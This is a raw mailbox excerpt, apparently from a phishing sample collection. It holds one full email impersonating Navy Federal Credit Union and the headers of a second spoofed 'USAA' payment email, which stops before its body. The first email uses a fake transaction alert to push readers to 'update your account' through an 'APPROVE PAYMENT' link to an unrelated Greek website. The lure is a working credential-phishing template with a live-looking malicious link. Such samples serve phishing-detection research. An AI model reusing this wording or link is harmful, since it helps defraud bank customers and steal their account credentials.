From: "Navy Federal ." <clon23@sbt.net>
Date: Thu, 03 May 2018 19:28:59 -0500
Message-Id: <20180504002932.BLLQ7726.dukecmfep05.coxmail.com@dukecmimpo03.coxmail.com>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 486

You will not see this in a MIME-aware mail reader.
--===============0093134292==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body



Dear Customer

 Navy.Federal Transaction Alert Service
 Please be informed that a Credit transaction occurred on your bank account.
 For safety reasons, You are adviced to update your account as a means to a=
pprove the transaction.
 APPROVE PAYMENT
 Your payment will be deposited into your account within 24 hours.
 Thank you,
 Navy.Federal Online Team

--===============0093134292==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta content=3D"text/html; charset=3Diso-8859-1" http-equiv=3D=
"content-type"><title>navy new</title></head><body><A style=3D"FONT-FAMILY:=
 Arial,sans-serif; COLOR: rgb(38,106,181)" href=3D"http://links.mkt030.com/=
ctt?kn=3D3&amp;ms=3DMTE3MTI2MDcS1&amp;r=3DMTg4MDYwNTM0MjQzS0&amp;b=3D0&amp;=
j=3DMTA4NDIxNDExNQS2&amp;mt=3D1&amp;rt=3D0" name=3Daolmail_logo rel=3D"noop=
ener noreferrer" target=3D_blank><IMG class=3Daolmail_img_resize_logo style=
=3D"VISIBILITY: visible" border=3D0 alt=3D"Navy Federal Credit Union" src=
=3D"http://contentz.mkt030.com/ra/2015/480/03/11712607/nfcu-logo.png" width=
=3D100 height=3D58></A><BR><BR>Dear Customer<BR><BR>
<P><STRONG>Navy.Federal Transaction Alert Service</STRONG></P>
<P>Please be informed that a Credit transaction occurred on your bank accou=
nt.</P>
<P>For safety reasons, You are adviced to update your account as a means to=
 approve the transaction.</P>
<P><A href=3D"http://vouzounaras.gr/nuvic.htm">APPROVE PAYMENT</A></P>
<P>Your payment will be deposited into your account within 24 hours.</P>
<P>Thank you,</P>
<P>Navy.Federal Online Team</P></BODY></HTML>
--===============0093134292==--

From jose@monkey.org Sat May  5 01:07:53 2018 +0000
Return-Path: customerservice.usaaa@usa.com
Delivered-To: jose@monkey.org
X-FDA: 74128225626.07.bulb10_440172be04742
X-Spam-Summary: 86,7.5,0,f26cf8e51d360071,d41d8cd98f00b204,customerservice.usaaa@usa.com,:customerservice.usaaa@usa.com,RULES_HIT:41:72:355:379:455:962:967:969:973:979:983:988:989:1021:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1432:1436:1437:1516:1517:1518:1534:1540:1566:1570:1575:1588:1589:1592:1594:1711:1714:1730:1749:1776:1792:1803:2198:2199:2525:2527:2540:2543:2561:2564:2682:2685:2693:2859:2890:2915:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3690:3865:3867:3871:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4180:4321:4362:4383:5007:6117:6119:6261:6674:6684:6687:6688:7652:7774:7809:7903:8599:8784:9025:9067:9388:9873:9908:9941:10013:10049:10240:10346:10400:11658:11914:12043:12050:12051:12217:12555:12561:12776:12903:12986:13141:13163:13229:13230:13236:13237:13439:14036:14094:14181:14516:14651:14721:14828:14829:14849:21080:21433:21450:21451:21627:21657:21659:30001:30007:30022:30026:30038:30054:30055:30064:30070:
X-HE-Tag: bulb10_440172be04742
X-Filterd-Recvd-Size: 2709
Received: from dukecmfep05.coxmail.com (dukecmfep05.coxmail.com [68.99.120.40])
	by imf13.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sat,  5 May 2018 01:07:47 +0000 (UTC)
Received: from dukecmimpo01.coxmail.com ([68.99.120.134])
          by dukecmfep05.coxmail.com
          (InterMail vM.8.01.05.08 201-2260-151-120-20120517) with ESMTP
          id <20180505010746.FDBE7726.dukecmfep05.coxmail.com@dukecmimpo01.coxmail.com>;
          Fri, 4 May 2018 21:07:46 -0400
Received: from [10.1.1.68] ([172.18.18.217])
	by dukecmimpo01.coxmail.com with bizsmtp
	id iQ6a1x0084h0NJL01R7Rb9; Fri, 04 May 2018 21:07:36 -0400
Content-Type: multipart/alternative; boundary="===============0396322236=="
MIME-Version: 1.0
Subject: New Payment Transfer
To: Recipients <customerservice.usaaa@usa.com>
